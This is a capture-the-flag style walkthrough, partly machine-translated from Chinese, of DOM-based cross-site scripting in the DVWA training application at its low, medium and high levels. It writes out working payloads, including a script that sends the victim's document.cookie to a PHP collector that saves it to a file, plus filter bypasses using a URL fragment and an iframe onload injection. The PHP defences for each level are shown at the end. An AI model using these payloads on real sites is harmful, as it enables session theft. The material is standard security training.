Cross-Site attacks XSS DOM (DOM Based Cross Site Scripting)
Preface:
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。
DOM XSS the first two cross-site attacks (reflection type, storage type) except that: there is no data with the backend server
low:
1. Observation:
In the form of pull-down option to view the html code
<script> if (document.location.href.indexOf("default=") >= 0) { var lang = document.location.href.substring(document.location.href.indexOf("default=")+8); document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>"); document.write("<option value='' disabled='disabled'>----</option>"); } document.write("<option value='English'>English</option>"); document.write("<option value='French'>French</option>"); document.write("<option value='Spanish'>Spanish</option>"); document.write("<option value='German'>German</option>"); </script> <option value="English">English</option> <option value="" disabled="disabled">----</option> <option value="English">English</option> <option value="French">French</option> <option value="Spanish">Spanish</option> <option value="German">German</option>
Four options can be found, the default English option
2. Use hackbar load URL View:
Found that the structure is simple, the script can be added after the default =
3. Try:
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<script>alert("test")</script>
execute to perform discovery pop-up alert
At this point in more than a html option option
4. steal cookie Preparation:
www folder to continue to use an essay on the php file and js files:
get_low_dvwa_cookie.php:
<?php $cookie=$_GET['cookie']; file_put_contents('get_low_dvwa_cookie.txt',$cookie); ?>
steal.js:
document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie;
5. Add the script:
= Add after default: < Script the src = "http://127.0.0.1/steal.js" > </ Script >
6. Execution:
You will be found to have been acquired and stored in the cookie file
medium:
1. Try <script>, case combination, <scr <script> ipt>:
Found not, and will not be executed, there is no change, then view the HTML code and found not inserted into the option, to be sure is to filter out the script tag
The first method # 2:
After # is not to the server can be bypassed, so the URL becomes
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?#default=<script src="http://127.0.0.1/steal.js"></script>
3. The second method:
Try iframe tag
<iframe onload="var b= document.createElement('script');
b.setAttribute('src','http://127.0.0.1/steal.js');
document.getElementsByTagName('head')[0].appendChild(b);">
Discovery options changed, but did not execute, view the HTML code found only value, no code, the lack of closure
4. the label before closing the iframe:
</option></select>
<iframe onload="var b= document.createElement('script');
b.setAttribute('src','http://127.0.0.1/steal.js');
document.getElementsByTagName('head')[0].appendChild(b);">
execution succeed!
high:
1. First try bypassing #
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?#default=<script src="http://127.0.0.1/steal.js"></script>
Oh roar, feasible!
2. The ratio of the three-level source code
By contrast php server source code can be seen bypassing the basis of the just.
low:
<?php # No protections, anything goes ?>
Without any treatment;
Medium:
<?php // Is there any input? if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) { $default = $_GET['default']; # Do not allow script tags if (stripos ($default, "<script") !== false) { header ("location: ?default=English"); exit; } } ?>
First determine whether the input is empty, not empty on assignment to default, and then judge the script tag, case do not work, so the server can be bypassed and change the label;
High:
<?php // Is there any input? if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) { # White list the allowable languages switch ($_GET['default']) { case "French": case "English": case "German": case "Spanish": # ok break; default: header ("location: ?default=English"); exit; } } ?>
Interact with the server, with the only option to match the job, so use # easily bypassed;
impossible:
Still no solution, view the server php source code:
<?php # Don't need to do anything, protction handled on the client side ?>